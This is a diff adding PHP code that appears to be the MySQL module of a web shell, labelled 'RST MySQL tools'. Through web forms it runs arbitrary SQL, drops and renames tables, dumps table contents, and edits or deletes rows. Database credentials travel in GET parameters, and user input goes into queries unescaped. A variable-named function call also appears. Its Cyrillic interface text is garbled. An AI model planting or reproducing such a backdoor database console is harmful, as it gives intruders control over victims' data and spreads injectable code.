+        <textarea name=\"new_query_bd\" rows=\"10\" cols=\"80\">$q_bd</textarea>
+        </td><td valign=top>
+        <input type=\"checkbox\" name=\"php_kod\" value=\"ok\"> �������� PHP-��� �������<br><br>
+        <input type=\"checkbox\" name=\"return_sql\" value=\"ok\" checked=\"checked\"> �������� ������ ������ �����<br>
+        <br>
+        <a href=\"$self?s=$s&q_help=ok\" tarGET=\"_blank\"><b>������� ��������</b></a>
+        </td></tr>
+        <tr><td>
+        <input type=\"submit\" value=\"������\">
+        </td></tr>
+        </table></form>";
+
+if (isset($db) && $HTTP_GET_VARS['q_tbl']=='bd') { 
+  print $form_query_db; 
+}
+if (isset($new_query_bd)) { 
+   $new_query_bd=trim($new_query_bd);
+   print $form_query_db;
+   if ($HTTP_GET_VARS['php_kod']=='ok') { 
+        print "&nbsp;&nbsp;&nbsp;<font color=green><b>PHP-��� �������:</b></font><br>&nbsp;&nbsp;&nbsp;\$sql=\"$new_query_bd\";<br><br>";
+   }
+  $r_q_bd=mysql_db_query($db, $new_query_bd) or die("$h_error".mysql_error()."$f_error");
+
+  print "&nbsp;&nbsp;&nbsp;<b>������ ������� ��������<b>";
+  if ($r_q_bd !=='') {
+    print "<table align=center width=98% bgcolor=#D7D8DA>";
+    while ($line_bd = @mysql_fetch_array($r_q_bd, MYSQL_ASSOC)) {
+        print "<tr>";
+        foreach ($line_bd as $key_bd =>$col_value_bd) {          
+            print "<td bgcolor=#EDEEF1>".htmlspecialchars($col_value_bd)."</td>";
+        }
+        print "</tr>";
+    }
+    print "</table><br>";
+    @mysql_free_result($r_q_bd);
+  }
+} 
+
+/*---------------�������� �������------------*/
+if (isset($drop_table) && isset($db)){ 
+ mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+ $query = "DROP TABLE IF EXISTS $drop_table";
+ $result = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error");
+ $t=base64_encode("<font color=green size=2><b>Action: </b></font><font color=#706D6D size=2>������� [ <b>$drop_table </b>] ������� �������.</font><br>");
+ print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&port=$port&t=$t'></head>";
+ unset($drop_table);
+}
+if (isset($q_i)) { $n_img($tag,$f_n,$img_c); }
+
+if (isset($db) && isset($tbl)) {
+ /*�������� ���������� ����� � �������*/
+ $count=mysql_query ("SELECT COUNT(*) FROM $tbl");
+ $count_row= mysql_fetch_array($count);  //$count_row[0] ���-�� �����
+ mysql_free_result($count);
+ print "<table border=0 align=center width=100% cellpadding=0 cellspacing=0>
+         <tr> 
+           <td>
+                <table align=center border=0 width=700 cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>
+                   <tr align=center>                      
+                      <td width=100 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&tbl=$tbl&st_tab=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"�������� ��������� $tbl\"><b>���������</b></a>
+                      </td>
+                      <td width=100 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&tbl=$tbl&login=$login&passwd=$passwd&server=$server&port=$port&nn_row=ok\" title=\"�������� ����� ��� � ������� $tbl\"><b>��������</b></a>
+                      </td>
+                      <td width=120 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&tbl=$tbl&login=$login&passwd=$passwd&server=$server&port=$port&query_tbl&q_tbl=table\" title=\"������������ SQL ������\"><b>SQL-������</b></a>
+                      </td>
+                      <td width=120 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$tbl&dump=tab\" title=\"������� ������ ������� $tbl\"><b>���� �������</b></a>
+                      </td>
+                      <td width=120 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$tbl&alter_table=TRUE\" title=\"������������� ������� $tbl\"><b>�������������</b></a>
+                      </td>
+                      <td width=120 bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&drop_table=$tbl&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"������� ������� $tbl\" onClick=\"return confirm('������� ������� $tbl ?')\";><b>������� �������</b></a>
+                     </td>
+                   </tr>
+                </table> 
+           </td>
+         </tr>
+         <tr>
+           <td><br>";
+                if (isset($t)) { print "&nbsp;&nbsp;".base64_decode($t);}
+                print "&nbsp;&nbsp;��:(<b>$db</b>)&nbsp;&nbsp;&nbsp;&nbsp;�������:(<b>$tbl</b>)&nbsp;&nbsp;&nbsp;
+                ����� �����:(<b>$count_row[0]</b>)
+           </td>
+         </tr>
+         <tr>
+           <td> 
+<table border=0 width=100% cellpadding=4 cellspacing=0 bgcolor=#FFFFFF>
+ <tr>
+   <td bgcolor=#E6E7E9 align=center valign=center>";
+
+$start=$limit_start+$limit_count;
+
+if (isset($start) && ($start>0)) {
+ print "<table align=center border=0 cellpadding=4 cellspacing=0>
+        <tr>";
+       
+if ($start+$limit_count >= $count_row[0]){
+$start=$limit_start;
+$limit_count=$count_row[0]-$start;
+}
+
+if (isset($start) && ($limit_start >= 30) ){
+  $back=$limit_start-30;
+  print "<form method=\"GET\" action=\"$self\">
+        <td bgcolor=#FFFFFF align=center>       
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"hidden\" name=\"limit_start\" value=\"$back\">
+        <input type=\"hidden\" name=\"limit_count\" value=\"30\">
+        <input type=\"submit\" value=\"<< �����(30)\">&nbsp;&nbsp;
+        </td></form>";
+}
+
+print " <form method=\"GET\" action=\"$self\">
+        <td bgcolor=#FFFFFF align=center>
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"submit\" value=\"��������\">&nbsp;&nbsp;��
+        <input type=\"text\" name=\"limit_start\" value=\"$start\" size=\"5\" maxlength=\"5\">������
+        &nbsp;&nbsp; <input type=\"text\" name=\"limit_count\" value=\"$limit_count\" size=\"5\" maxlength=\"5\">����� �������
+        </td></form>";
+
+if ( isset($limit_start) && ($start <= $count_row[0]) ){
+ print "<form method=\"GET\" action=\"$self\">
+        <td bgcolor=#FFFFFF align=center>
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"hidden\" name=\"limit_start\" value=\"$start\">
+        <input type=\"hidden\" name=\"limit_count\" value=\"30\">
+        <input type=\"submit\" value=\"������(30)>>\">
+        </td></form>";
+}
+
+print "</tr></form></table>";
+}
+
+
+/*------------�������������� �������------------*/
+if ($alter_table=="TRUE"){
+print " <form method=\"GET\" action=\"$self\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"hidden\" name=\"alter_table\" value=\"$alter_table\">
+        <table border=0 cellpadding=4 cellspacing=1 bgcolor=#FFFFFF>
+        <tr><td bgcolor=#DAD9D9 align=center><font size=2>������������� ������� [ <b>$tbl</b> ]</font></td></tr>
+        <tr><td bgcolor=#DAD9D9>����� ��� �������:
+        <input type=\"text\" name=\"alttbl\" value=\"\">
+        <input type=\"submit\" value=\"�������������\" onClick=\"return confirm('�� �������, ��� ������ ������������� ������� \' $tbl \' ?')\";>
+        </td></tr></table></form>";
+}
+
+ if (isset($alttbl)){
+ mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+ //$query = "RENAME TABLE $tbl TO $alttbl";
+ $query = "ALTER TABLE $tbl RENAME TO $alttbl";
+ $result = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+ $t=base64_encode("<font color=green size=2><b>Action: </b></font><font color=#706D6D size=2>������� [ <b>$tbl ]</b> ������������� � [ <b>$alttbl</b> ]</font><br>");
+ print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&port=$port&tbl=$alttbl&limit_start=0&limit_count=5&t=$t'></head>";
+ }
+
+/*-------------------��������� �������-----------------*/
+if (isset($st_tab) && $st_tab=='TRUE'){
+ mysql_select_db($st_db);
+ $result = mysql_query('desc '.$tbl, $connection); 
+ print "<br><center><font size=2>��������� ������� [ <b>$tbl</b> ]</font><center>".
+       "<table align=center border=0 cellpadding=2 cellspacing=1 width=700 bgcolor=#FFFFFF>";
+ 
+ for ($i=0;$i<@mysql_num_fields($result);$i++){
+       $name=mysql_field_name($result,$i);
+       $name=eregi_replace("Field","����",trim($name));
+       $name=eregi_replace("Type","���",trim($name));
+       $name=eregi_replace("Null","����",trim($name));
+       $name=eregi_replace("Key","�������",trim($name));
+       $name=eregi_replace("Default","�� ���������",trim($name));
+       $name=eregi_replace("Extra","�������������",trim($name));
+       $nn .= "<td align=center bgcolor=#C7C5C5><b>$name</b></td>";   
+ } 
+ print "<tr>$nn</tr>";
+ while ($l_tbl = @mysql_fetch_array($result, MYSQL_ASSOC)) {      
+     print "<tr bgcolor=#E7E7D7>";
+     foreach ($l_tbl as $k_tbl =>$col_v_tbl) {          
+          if (strtoupper(substr($col_v_tbl, 0, 3)) === 'PRI') {
+             $col_v_tbl="���������";
+          }
+          if (strtoupper(substr($col_v_tbl, 0, 3)) === 'UNI') {
+             $col_v_tbl="����������";
+          }
+          if (strtoupper(substr($col_v_tbl, 0, 3)) === 'MUL' && $col_v_tbl !=='') {
+             $col_v_tbl="������";
+          }
+          if (strtoupper(substr($col_v_tbl, 0, 3)) === 'YES') { $col_v_tbl="��"; }
+          if (eregi("Field", $k_tbl)) { 
+             print "<td><font color=green><b>".htmlspecialchars($col_v_tbl)."</b></font></td>";
+          }elseif (eregi("Type", $k_tbl)) { 
+             print "<td align=left>".htmlspecialchars($col_v_tbl)."</td>";
+          }else{
+             print "<td align=center>".htmlspecialchars($col_v_tbl)."</td>";             
+          }
+     }
+     print "</tr>";
+ }
+ print "</table><br>";
+ @mysql_free_result($result);
+}
+
+/*-------------������������ ������ � �������-------------*/
+if ($HTTP_GET_VARS['q_tbl']=='table') { $q_tbl="SELECT * FROM `$tbl` WHERE 1 LIMIT 0, 30"; }
+if ($HTTP_GET_VARS['return_sql']=='ok') { $q_tbl=trim($HTTP_GET_VARS['new_query_tbl']); }
+$form_query_db_tbl="<br>
+        <form method=\"GET\" action=\"$self?s=$s\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">                
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"tbl\" value=\"$tbl\">
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <table width=90% border=0 bgcolor=#EDEEF1><tr><td>��������� ������������ ������ � ������� ( <b>$tbl</b> )</td></tr>
+        <tr><td width=90>
+        <textarea name=\"new_query_tbl\" rows=\"10\" cols=\"80\">$q_tbl</textarea>
+        </td><td valign=top>
+        <input type=\"checkbox\" name=\"php_kod\" value=\"ok\"> �������� PHP-��� �������<br><br>
+        <input type=\"checkbox\" name=\"return_sql\" value=\"ok\" checked=\"checked\"> �������� ������ ������ �����<br>
+        <br>
+        <a href=\"$self?s=$s&q_help=ok\" tarGET=\"_blank\"><b>������� ��������</b></a>
+        </td></tr>
+        <tr><td>
+        <input type=\"submit\" value=\"������\">
+        </td></tr>
+        </table></td></form>";
+
+
+if (isset($HTTP_GET_VARS['query_tbl']) || $HTTP_GET_VARS['q_tbl']=='table') { 
+  print $form_query_db_tbl."<br>"; 
+}
+
+
+if (isset($new_query_tbl)) {
+   $new_query_tbl=trim($new_query_tbl);
+   print $form_query_db_tbl;
+
+
+   $result_tbl = mysql_query($new_query_tbl) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   if ($result_tbl !=='') {
+      print " 
+      <table align=center border=0 width=90% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF><tr>";
+      if ($php_kod=='ok') { print "<font color=green><b>PHP-��� �������:</b></font><br>\$sql = \"$new_query_tbl\";<br><br>"; }
+      if (preg_match("[drop]",$new_query)) { print "������� �������, �������� ������ ������ ����."; }
+
+      print "<br><b>������ ������� ��������</b><br>";
+      /*�������� �������� ��������*/
+      for ($i=0;$i<@mysql_num_fields($result_tbl);$i++){
+           $name_tbl=mysql_field_name($result_tbl,$i);
+           print "<td bgcolor=#C7C5C5>$name_tbl</td>";   
+      } 
+
+      print "</tr>";
+      while ($line_tbl = @mysql_fetch_array($result_tbl, MYSQL_ASSOC)) {
+         print "<tr>";
+         foreach ($line_tbl as $key_tbl =>$col_value_tbl) {          
+             print "<td bgcolor=#EDEEF1>".htmlspecialchars($col_value_tbl)."</td>";
+         }
+         print "</tr>";
+      }
+      print "</table><br>";
+      @mysql_free_result($result_tbl);
+   }
+}
+
+/*-------------�������� ������ �������--------------*/
+if (!isset($alter_table) && !isset($st_tab) && !isset($query_tbl) && !isset($new_query_tbl) && 
+!isset($dump) && !isset($strukt) && !isset($query_edit) && !isset($query_del) && !isset($q_GET) && 
+!isset($nn_row) && !isset($nn) && !isset($upd_f)) {
+  print "<br><table border=0 cellpadding=1 cellspacing=1 width=100% bgcolor=#FFFFFF><tr>";
+
+//���������� ������ ��� �������, �� ������ ����(�����) ����� ������ ������������� ������
+//Key_name ��� �������, Column_name ��� �������
+$query_ind = 'SHOW KEYS FROM '.$tbl;
+$result_ind = mysql_query($query_ind) or die("$h_error<b>".mysql_error()."</b>$f_error");
+
+while ($row = mysql_fetch_array($result_ind, MYSQL_ASSOC)) {
+    if ($row['Key_name'] == 'PRIMARY') {
+        $primary[] .= $row['Column_name'];
+    } 
+}
+ 
+mysql_free_result($result_ind);
+
+ $query = "SELECT * FROM $tbl LIMIT $limit_start,$limit_count";
+ $result = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error");
+if (mysql_num_rows($result) == 0) {
+  print "������� <b>$tbl</b> �� �������� �� ����� ������";
+}else{
+  /*�������� �������� ��������*/
+  print "<td bgcolor=#E6E7E9></td><td bgcolor=#E6E7E9></td>";
+  for ($i=0;$i<mysql_num_fields($result);$i++){
+    $name=mysql_field_name($result,$i);
+    print "<td bgcolor=#C7C5C5>$name</td>";   
+  } 
+}
+  while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
+     print "</tr>";
+
+     foreach ($line as $key =>$col_value) {
+
+         if (count($primary) > 0) { 
+           if (in_array($key,$primary)) { $edit .= urlencode("`$key`='$col_value' AND "); } 
+         } 
+         else {
+            //if (strlen($col_value) >= 20) { 
+            //   $e_count=substr($col_value,0,20);
+            //   $edit .= urlencode("`$key`='$e_count' AND ");
+            //} else {
+               $edit .= urlencode("`$key`='$col_value' AND ");
+            //}
+            
+         } 
+
+        $string .= "<td bgcolor=#EDEEF1>".htmlspecialchars($col_value)."</td>";
+     }
+       $edit=substr_replace($edit,"",-5); //��������� ��������� +AND+
+       print "<tr><td bgcolor=#97C8D4 width=25><a href=$self?query_edit=$edit&s=y&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$tbl title=\"������������� �������� �������\">Edit</a></td>".
+             "<td bgcolor=#F84C6C width=25><a href=$self?query_del=$edit&s=y&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$tbl title=\"������� ������\" onClick=\"return confirm('������� ������, ������� ?')\";>Del</a></td>".
+             $string."</tr>";
+    
+       unset($edit);
+       unset($string);
+  }
+
+  mysql_free_result($result);
+  print "</table><br>";
+}
+
+//������� ������
+if (isset($query_del)) {
+ $query = 'DELETE FROM '.$tbl.' WHERE '.urldecode($query_del);
+ $r_del = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error");
+ print "������� ������� ����� (<b> ".mysql_affected_rows()."</b> )";
+
+}
+
+//������� ����� �������������� ������
+if (isset($query_edit)) {
+ $query = 'SELECT * FROM '.$tbl.' WHERE '.urldecode($query_edit);
+ $r_edit = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+
+
+print "<br><center><font color=green><h5>�������������� �������� ����� �������</h5></font></center>".
+      "<table border=0 cellpadding=1 cellspacing=1 bgcolor=#FFFFFF><tr bgcolor=#C7C5C5>".
+      "<td align=center><b>����</b></td><td align=center><b>��������</b></td></tr>";
+print   "<form method=\"GET\" action=\"$self\">".
+        "<input type=\"hidden\" name=\"s\" value=\"$s\">".
+        "<input type=\"hidden\" name=\"q_GET\" value=\"y\">".
+        "<input type=\"hidden\" name=\"server\" value=\"$server\">".
+        "<input type=\"hidden\" name=\"port\" value=\"$port\">".
+        "<input type=\"hidden\" name=\"login\" value=\"$login\">".
+        "<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+        "<input type=\"hidden\" name=\"db\" value=\"$db\">".
+        "<input type=\"hidden\" name=\"tbl\" value=\"$tbl\">";
+     print "<input type=\"radio\" name=\"up_str\" value=\"up_ok\" checked=\"checked\">�������� ��������&nbsp;&nbsp;<b>���</b>&nbsp;&nbsp;&nbsp;".
+           "<input type=\"radio\" name=\"up_str\" value=\"ins_ok\">�������� ����� ���<br><br>";
+
+  while ($line = mysql_fetch_array($r_edit, MYSQL_ASSOC)) {
+     foreach ($line as $key =>$col_value) {
+        $del_str_� .= "`$key`='$col_value' AND ";
+        $len_value=strlen($col_value);
+        if ($len_value > 40) { $t_value="<textarea name=$key cols=39 rows=5>$col_value</textarea>"; }
+        else { $t_value="<input type='text' name='$key' value='$col_value'size=40>"; }
+        $g_query .= "<tr><td bgcolor=#DBDCDD><b>$key</b></td><td>$t_value</td></tr>";
+     }
+  }
+     $del_str=urlencode($del_str_�);
+     print "<input type=\"hidden\" name=\"del_str\" value=\"$del_str\">";
+     print "$g_query</table><br>";
+     print "<br><input type=submit value=\"�������� ��������\"></form>";
+}
+
+if (isset($q_GET)) {
+  $url=$HTTP_SERVER_VARS['QUERY_STRING'];
+  if ($HTTP_GET_VARS['up_str']=='up_ok') {
+     $del_str=urldecode(substr_replace($del_str,"",-5));
+     $b = explode('&', $url);
+     for ($i = 10; $i < count($b); $i++) {
+        $q = explode("=",$b[$i]);
+        $q_a .= "`".$q[0]."`='".$q[1]."', ";
+     }
+     $q_a_ins=urldecode(substr_replace($q_a,"",-2));
+     $q_st=urldecode(substr_replace($q_st,"",-2));
+     //��� �������� $del_str 
+     //�� ��� ����� ������ $q_a_ins
+
+     $up="UPDATE `$tbl` SET $q_a_ins WHERE $del_str LIMIT 1";
+     $q_ins_new = mysql_query($up) or die("$h_error<b>".mysql_error()."</b>$f_error");
+     $c_a_r=mysql_affected_rows();
+     print "<table align=left width=70% bgcolor=#D7D8DA><tr><td><font color=green>".
+           "<b>PHP-��� �������:</b></font></td></tr><tr><td>\$sql=\"$up\";</td>".
+           "</tr><tr><td><font color=green>�������� �����</font> (<b>$c_a_r<b>)</td></tr></table>";
+  }
+  if ($HTTP_GET_VARS['up_str']=='ins_ok') {
+     $b = explode('&', $url);
+     for ($i = 10; $i < count($b); $i++) {
+        $q = explode("=",$b[$i]);
+        $i_cols .="`$q[0]`, ";
+        $i_val .= "'$q[1]', ";
+     }
+     $i_cols=urldecode(substr_replace($i_cols,"",-2)); //�������
+     $q_a_ins=urldecode(substr_replace($i_val,"",-2)); //��������
+     $up="INSERT INTO `$tbl` ($i_cols) VALUES ($q_a_ins)";
+     $q_ins_new = mysql_query($up) or die("$h_error<b>".mysql_error()."</b>$f_error");
+     $c_a_r=mysql_affected_rows();
+     print "<table align=left width=70% bgcolor=#D7D8DA><tr><td><font color=green>".
+           "<b>PHP-��� �������:</b></font></td></tr><tr><td>\$sql=\"$up\";</td>".
+           "</tr><tr><td><font color=green>�������� �����</font> (<b>$c_a_r<b>)</td></tr></table>";
+    
+  }
+}
+
+/*------------�������� ���--------------*/
+if (isset($nn_row) && $HTTP_GET_VARS['nn_row']=='ok') {
+ $nn_q = 'SHOW FIELDS FROM '.$tbl;
+ $r_n = mysql_query($nn_q) or die("$h_error<b>".mysql_error()."</b>$f_error");
+print   "<form method=\"GET\" action=\"$self\">".
+        "<input type=\"hidden\" name=\"s\" value=\"$s\">".
+        "<input type=\"hidden\" name=\"nn\" value=\"ok\">".
+        "<input type=\"hidden\" name=\"server\" value=\"$server\">".
+        "<input type=\"hidden\" name=\"port\" value=\"$port\">".
+        "<input type=\"hidden\" name=\"login\" value=\"$login\">".
+        "<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+        "<input type=\"hidden\" name=\"db\" value=\"$db\">".
+        "<input type=\"hidden\" name=\"tbl\" value=\"$tbl\">".
+        "<br><center><font size=2>�������� ����� ��� � ������� [ <b>$tbl</b> ]</font></center>".        
+        "<br><table border=0 cellpadding=0 cellspacing=1 bgcolor=#FFFFFF><tr bgcolor=#DAD9D9>".
+        "<td align=center><b>����</b></td><td align=center><b>���</b></td>".
+        "<td align=center><b>��������</b></td></tr>";
+  while ($n_line = mysql_fetch_array($r_n, MYSQL_ASSOC)) {
+     foreach ($n_line as $n_k =>$n_v) {
+        $pole .= "$n_v ";
+     }
+       $n_l=explode(" ",$pole);
+       print "<tr bgcolor=#EDEEF1><td>&nbsp;<b>$n_l[0]</b>&nbsp;</td><td bgcolor=#E7E7D7>&nbsp;".
+              wordwrap($n_l[1],40,"<br>",1).
+              "&nbsp;</td><td><input type=text name=\"$n_l[0]\" size=35><td></tr>";             
+       unset($pole); 
+  }
+  print "</table><br><center><input type=submit value=\"�������� ����� ���\"></center></form><br>";
+}
+
+if (isset($nn) && $HTTP_GET_VARS['nn']=='ok') {
+     $url_n=urldecode($HTTP_SERVER_VARS['QUERY_STRING']);
+     $b_nn = explode('&', $url_n);
+     for ($i = 8; $i < count($b_nn); $i++) {
+        $q_nn = explode("=",$b_nn[$i]);
+          $q_a_nn .= "`".$q_nn[0]."` ,";        
+          $q_nn_v .= "'".$q_nn[1]."' ,";
+     }
+
+     $q_nn_ins=urldecode(substr_replace($q_a_nn,"",-2));
+     $q_nn_v=substr_replace($q_nn_v,"",-2);
+     $sql_n="INSERT INTO `$tbl` ( $q_nn_ins ) VALUES ( $q_nn_v )";
+     mysql_query($sql_n) or die("$h_error<b>".mysql_error()."</b>$f_error");
+     $c_n_r=mysql_affected_rows();
+     print "&nbsp;&nbsp;&nbsp;<table align=left width=70% bgcolor=#D7D8DA>".
+           "<tr><td><b>Action:</b> <font color=green>������� ��������� �����</font> (<b>$c_n_r<b>)</td></tr>".
+           "<tr><td><font color=green><b>PHP-��� �������:</b></font></td></tr><tr><td>\$sql=\"$sql_n\";</td></tr></table><br><br>";
+}
+
+/*-----------dump �������------------*/
+$form_dump=
+"<form method=\"GET\" action=\"$self\">".
+"<input type=\"hidden\" name=\"s\" value=\"$s\">".
+"<input type=\"hidden\" name=\"db\" value=\"$db\">".
+"<input type=\"hidden\" name=\"tbl\" value=\"$tbl\">".
+"<input type=\"hidden\" name=\"server\" value=\"$server\">".
+"<input type=\"hidden\" name=\"port\" value=\"$port\">".
+"<input type=\"hidden\" name=\"login\" value=\"$login\">".
+"<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+"<input type=\"hidden\" name=\"f_dump\" value=\"$file\">".
+"<table bgcolor=#FFFFFF width=400 cellpadding=0 cellspacing=1 border=0><tr bgcolor=#F0F1F4><td valign=top>".
+"<table cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+"<tr><td align=center><b>Dump �������</b> [ <font color=green><b>$tbl</b></font> ]</td></tr>".
+"<tr><td><input type=\"radio\" name=\"strukt\" value=\"t_strukt\"> ������ ���������</td></tr>".
+"<tr><td><input type=\"radio\" name=\"strukt\" value=\"d\"> ������ ������</td></tr>".
+"<tr><td><input type=\"radio\" name=\"strukt\" value=\"d_strukt\" checked=\"checked\"> ��������� � ������</td></tr>".
+"<tr><td align=center><hr size=1 color=#FFFFFF><b>��������</b> (��������/���������)</td></tr>".
+"<tr><td><input type=\"radio\" name=\"send\" value=\"send_br\" checked=\"checked\"> �������� � ��������</td></tr>".
+"<tr><td><input type=\"radio\" name=\"send\" value=\"send_http\"> ��������� ���� ����� �� HTTP</td></tr>".
+"<tr><td align=center><br><input type=\"submit\" value=\"��������� ������\"></td></tr>".
+"</table>".
+"</td></tr></table></form>";
+
+if ($dump=="tab"){ print $form_dump;}
+/*----------������ ���������------------*/
+
+if ($HTTP_GET_VARS['strukt']=='t_strukt' && $HTTP_GET_VARS['send']=='send_br' ){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   //$file = "/tmp/dump_".$tbl.".sql";
+   // ��������� ���� ��� ������ ����� 
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_GET_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
+
+      // �������� ����� ������� �������� ��������� ������� 
+      $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
+      fputs($fp, $row[1].";\n\n");   
+   fclose($fp); 
+   $dump_file=file($file);
+print "<br><table bgcolor=#FFFFFF width=99% cellpadding=0 cellspacing=1 border=1><tr><td><table width=100% cellpadding=2 bgcolor=#F0F1F4>";
+foreach ($dump_file as $k=>$v){$v=str_replace("\n","<br>",$v);print "<tr><td>".strip_tags($v,"<br>")."</td></tr>";}
+print "</table></td></tr></table><br>";
+
+unlink($file);
+}
+
+/*----------��������� � ������------------*/
+if ($HTTP_GET_VARS['strukt']=='d_strukt' && $HTTP_GET_VARS['send']=='send_br'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   //$file = "/tmp/dump_".$tbl.".sql";
+   // ��������� ���� ��� ������ ����� 
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n # MySQL version: (".mysql_GET_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n"); 
+
+      // �������� ����� ������� �������� ��������� ������� 
+      $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
+      fputs($fp, $row[1].";\n\n"); 
+       
+      // �������� ������ ������� 
+      $res = mysql_query("SELECT * FROM `$tbl`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      }
+ 
+   fclose($fp); 
+$dump_file=file($file);
+print "<br><table bgcolor=#FFFFFF width=99% cellpadding=0 cellspacing=1 border=1><tr><td><table width=100% cellpadding=2 bgcolor=#F0F1F4>";
+foreach ($dump_file as $k=>$v){$v=str_replace("\n","<br>",$v);print "<tr><td>".strip_tags($v,"<br>")."</td></tr>";}
+print "</table></td></tr></table><br>";
+unlink($file);
+}
+
+/*----------������ ������------------*/
+if ($HTTP_GET_VARS['strukt']=='d' && $HTTP_GET_VARS['send']=='send_br'){
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+
+   mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   //$file = "/tmp/dump_".$tbl.".sql";
+   // ��������� ���� ��� ������ ����� 
